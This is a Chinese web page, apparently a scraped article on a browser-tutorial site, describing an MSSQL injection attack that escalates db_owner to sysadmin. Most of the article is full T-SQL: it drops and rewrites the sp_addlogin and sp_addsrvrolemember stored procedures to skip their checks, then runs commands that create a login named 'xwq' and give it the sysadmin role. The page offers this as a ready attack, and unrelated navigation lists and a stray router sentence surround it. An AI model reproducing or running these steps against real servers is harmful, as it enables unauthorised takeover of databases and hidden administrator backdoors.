SQL注入攻击通杀 - 浏览器大全

浏览器大全：是一个提供流行浏览器教程、在线学习分享的学习平台！

文章发布全站软件文章热门搜索：下载文件模式分享流量过滤广告添加首页 2345浏览器 QQ浏览器 360浏览器谷歌浏览器 UC浏览器搜狗浏览器软件大全游戏教程电脑系统下载 IE浏览器 Edge浏览器火狐浏览器猎豹浏览器安卓浏览器百度浏览器装机软件苹果应用硬件手机游戏游戏攻略您当前所在位置：站点教程中心 -> 装机软件 -> SQL注入攻击通杀
SQL注入攻击通杀发表时间：2025-12-05 来源：浏览器大全整理相关软件相关文章人气：数据库，简而言之可视为电子化的文件柜——存储电子文件的处所，用户可以对文件中的数据进行新增、截取、更新、删除等操作。所谓“数据库”是以一定方式储存在一起、能与多个用户共享、具有尽可能小的冗余度、与应用程序彼此独立的数据集合。 MSSQL注入通杀，只要有注入点就有系统权限　　不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin 　　@loginame sysname 　　,@passwd sysname = Null 　　,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT 　　CONFIGURABLE??? 　　,@deflanguage sysname = Null 　　,@sid varbinary(16) = Null 　　,@encryptopt varchar(20) = Null 　　AS 　　-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- 　　set nocount on 　　Declare @ret int -- return value of sp call 　　-- DISALLOW USER TRANSACTION -- 　　set implicit_transactions off 　　IF (@@trancount > 0) 　　begin 　　raiserror(15002,-1,-1,’sp_addlogin’) 　　return (1) 　　end 　　-- VALIDATE LOGIN NAME AS: 　　-- (1) Valid SQL Name (SQL LOGIN) 　　-- (2) No backslash (NT users only) 　　-- (3) Not a reserved login name 　　execute @ret = sp_validname @loginame 　　if (@ret <> 0) 　　return (1) 　　if (charindex(’\’, @loginame) > 0) 　　begin 　　raiserror(15006,-1,-1,@loginame) 　　return (1) 　　end 　　--Note: different case sa is allowed. 　　if (@loginame = ’sa’ or lower(@loginame) in (’public’)) 　　begin 　　raiserror(15405, -1 ,-1, @loginame) 　　return (1) 　　end 　　-- LOGIN NAME MUST NOT ALREADY EXIST -- 　　if exists(select * from master.dbo.syslogins where loginname = 　　@loginame) 　　begin 　　raiserror(15025,-1,-1,@loginame) 　　return (1) 　　end 　　-- VALIDATE DEFAULT DATABASE -- 　　IF db_id(@defdb) IS NULL 　　begin 　　raiserror(15010,-1,-1,@defdb) 　　return (1) 　　end 　　-- VALIDATE DEFAULT LANGUAGE -- 　　IF (@deflanguage IS NOT Null) 　　begin 　　Execute @ret = sp_validlang @deflanguage 　　IF (@ret <> 0) 　　return (1) 　　end 　　ELSE 　　begin 　　select @deflanguage = name from master.dbo.syslanguages 　　where langid = @@default_langid --server default 　　language 　　if @deflanguage is null 　　select @deflanguage = N’us_english’ 　　end 　　-- VALIDATE SID IF GIVEN -- 　　if ((@sid IS NOT Null) and (datalength(@sid) <> 16)) 　　begin 　　raiserror(15419,-1,-1) 　　return (1) 　　end 　　else if @sid is null 　　select @sid = newid() 　　if (suser_sname(@sid) IS NOT Null) 　　begin 　　raiserror(15433,-1,-1) 　　return (1) 　　end 　　-- VALIDATE AND USE ENCRYPTION OPTION -- 　　declare @xstatus smallint 　　select @xstatus = 2 -- access 　　if @encryptopt is null 　　select @passwd = pwdencrypt(@passwd) 　　else if @encryptopt = ’skip_encryption_old’ 　　begin 　　select @xstatus = @xstatus 0x800, -- old-style 　　encryption 　　@passwd = convert(sysname, convert(varbinary 　　(30), convert(varchar(30), @passwd))) 　　end 　　else if @encryptopt <> ’skip_encryption’ 　　begin 　　raiserror(15600,-1,-1,’sp_addlogin’) 　　return 1 　　end [page_break]-- ATTEMPT THE INSERT OF THE NEW LOGIN -- 　　INSERT INTO master.dbo.sysxlogins VALUES 　　(NULL, @sid, @xstatus, getdate(), 　　getdate(), @loginame, convert(varbinary(256), @passwd), 　　db_id(@defdb), @deflanguage) 　　if @@error <> 0 -- this indicates we saw duplicate row 　　return (1) 　　-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 　　SYSLOGINS CHANGE -- 　　exec(’use master grant all to null’) 　　-- FINALIZATION: RETURN SUCCESS/FAILURE -- 　　raiserror(15298,-1,-1) 　　return (0) -- sp_addlogin 　　GO 　　OK,我们新建个用户exec master..sp_addlogin xwq 　　再drop procedure sp_addsrvrolemember,然后在IE里输入　　create procedure sp_addsrvrolemember 　　@loginame sysname, -- login name 　　@rolename sysname = NULL -- server role name 　　as 　　-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- 　　set nocount on 　　declare @ret int, -- return value of sp call 　　@rolebit smallint, 　　@ismem int 　　-- DISALLOW USER TRANSACTION -- 　　set implicit_transactions off 　　IF (@@trancount > 0) 　　begin 　　raiserror(15002,-1,-1,’sp_addsrvrolemember’) 　　return (1) 　　end 　　-- CANNOT CHANGE SA ROLES -- 　　if @loginame = ’sa’ 　　begin 　　raiserror(15405, -1 ,-1, @loginame) 　　return (1) 　　end 　　-- OBTAIN THE BIT FOR THIS ROLE -- 　　select @rolebit = CASE @rolename 　　WHEN ’sysadmin’ THEN 16 　　WHEN ’securityadmin’ THEN 32 　　WHEN ’serveradmin’ THEN 64 　　WHEN ’setupadmin’ THEN 128 　　WHEN ’processadmin’ THEN 256 　　WHEN ’diskadmin’ THEN 512 　　WHEN ’dbcreator’ THEN 1024 　　WHEN ’bulkadmin’ THEN 4096 　　ELSE NULL END 　　-- ADD ROW FOR NT LOGIN IF NEEDED -- 　　if not exists(select * from master.dbo.syslogins where 　　loginname = @loginame) 　　begin 　　execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame 　　if (@ret <> 0) 　　begin 　　raiserror(15007,-1,-1,@loginame) 　　return (1) 　　end 　　end 　　-- UPDATE ROLE MEMBERSHIP -- 　　update master.dbo.sysxlogins set xstatus = xstatus @rolebit, 　　xdate2 = getdate() 　　where name = @loginame and srvid IS NULL 　　-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE 　　SYSLOGINS CHANGE -- 　　exec(’use master grant all to null’) 　　raiserror(15488,-1,-1,@loginame,@rolename) 　　-- FINALIZATION: RETURN SUCCESS/FAILURE 　　return (@@error) -- sp_addsrvrolemember 　　GO 　　接着再exec master..sp_addsrvrolemember xwq,sysadmin 　　这样就建立了一个SA用户了，用SQL连接器连接上就OK了。全新的路由器不仅让你更稳定快速地连接无线网络，更可以让家中的智能设备连接在一起。标签：SQL注入攻击通杀上一篇：SQL Server 2000的安全设置下一篇：SQL Server 安全检查下文	推荐资讯总人气榜 1Chrome却被另外中国的UC浏览器超过改用UC浏览器 2Chrome却被另外中国的UC浏览器超过改用UC浏览器 3未来手机上也许只有浏览器流量入口的手机浏览器 4商务英语最广泛搜狗手机浏览器处理中英互译 5最强的小说浏览利器搜狗手机浏览器免费看热门小说 6三星手机浏览器存有高危险性的漏洞升级来修復 7手机浏览器市场进入成熟期并完成了最终转型 8超过UC排名 360手机浏览器“内容+安全”再次显示实力 9360手机浏览器“安全+内容”战略再升级用户满意度排行榜... 1012月浏览器市场占有份额排名-常用浏览器排行榜 112018年1月份浏览器软件哪个速度快好用 12黑客非法访问的CPU漏洞防御该系列CPU漏洞的360浏览... 1酷狗音乐如何改歌名？酷狗音乐更改歌名方法 2酷狗音乐如何改歌名？酷狗音乐更改歌名方法 3酷狗音乐如何大局部下载？酷狗音乐大局部下载歌曲方法 4酷狗音乐如何取消自动续费？酷狗音乐自动续费技巧关闭方法 5酷狗音乐听歌识曲在什么地方？PC版酷狗音乐听歌识曲运用方法... 6酷狗音乐如何免费下载付费歌曲？酷狗音乐免费下载付费歌曲向导... 7酷狗音乐如何直播？酷狗音乐新版本开直播的方法 8酷狗音乐如何用手机遥控？酷狗音乐遥控器运用向导 9酷狗音乐无法连接网络如何回事？酷狗音乐连不上网络处理方法 102345输入法如何打出特殊标记？2345输入法输入特殊标记... 112345输入法如何删除？完全删除二三四五输入法的方法 122345王牌输入法如何打日语？2345输入法输入日语的方法最新教程本月人气 1一段用ASP查看ASP文件源码的程序 2ASP显示在线人数 3ASP汉字转拼音函数 4ASP中Request对象取得客户端数据的顺序 5asp下用OracleInProcServer完成对Ora... 6ASP+JavaScript的完整的日历使用 7ASP从数据库中取得文件 8掌握ASP其实只需要6步 9对于asp调试出错信息 10ASP 编程中 20 个10分实用的例子——适合入门者 11ASP入门者如何迅速基础 12对于#include的说明 1掌握ASP其实只需要6步 2对于asp调试出错信息 3ASP 编程中 20 个10分实用的例子——适合入门者 4ASP入门者如何迅速基础 5对于#include的说明 6ASP问答集 7模仿PHP写的ASP 分页 8ASP汉字转拼音函数 9ASP中Request对象取得客户端数据的顺序 10asp下用OracleInProcServer完成对Ora... 11ASP+JavaScript的完整的日历使用 12ASP显示在线人数
相关文章一段用ASP查看ASP文件源码的程序 ASP显示在线人数 ASP汉字转拼音函数 ASP中Request对象取得客户端数据的顺 asp下用OracleInProcServe ASP+JavaScript的完整的日历使用 ASP从数据库中取得文件掌握ASP其实只需要6步对于asp调试出错信息 ASP 编程中 20 个10分实用的例子—— ASP入门者如何迅速基础对于#include的说明相关软件 2345加速浏览器官方版 2345加速浏览器官方版 \| 56.2MB 新一代2345加速浏览器采用Chromium和IE双内核，主打极速与安全特性。基于Chromium深度定制，引入网页智能预加载技术，访问网页更快速.. 立即下载 QQ浏览器官方正式版 QQ浏览器官方正式版 \| 49.67MB QQ浏览器秉承TT浏览器1-4系列方便易用的特点，但技术架构不同，交互和视觉表现也重新设计，采用Chromium内核+IE双内核，让浏览快速稳定... 立即下载百度浏览器最新版下载百度浏览器最新版下载 \| 13.3MB q百度浏览器，是一款简洁轻快、智能懂你的浏览器。依靠百度强大的搜索平台，在满足用户浏览网页的基础上，它整合百度体系业务优势，带给用户更方便的浏览方式功能... 立即下载 UC浏览器官方正式版 UC浏览器官方正式版 \| 44.2MB UC浏览器（UC Browser）是UC Mobile Limited在2004年8月开发的一款软件，分uc手机浏览器和uc浏览器电脑版。UC浏览器是全球使用量最大的第三方手机浏览器... 立即下载猎豹浏览器2022最新版下载猎豹浏览器2022下载 \| 45MB 猎豹安全浏览器对Chrome的Webkit内核进行了超过100项的技术优化，访问网页速度更快。其具有首创的智能切换引擎，动态选择内核匹配不同网页... 立即下载 360安全浏览器官方版下载 360安全浏览器下载 \| 21.4MB 360安全浏览器拥有全国最大的恶意网址库，采用恶意网址拦截技术，可自动拦截挂马、欺诈、网银仿冒等恶意网址。独创沙箱技术，在隔离模式即使访问****也不会感染... 立即下载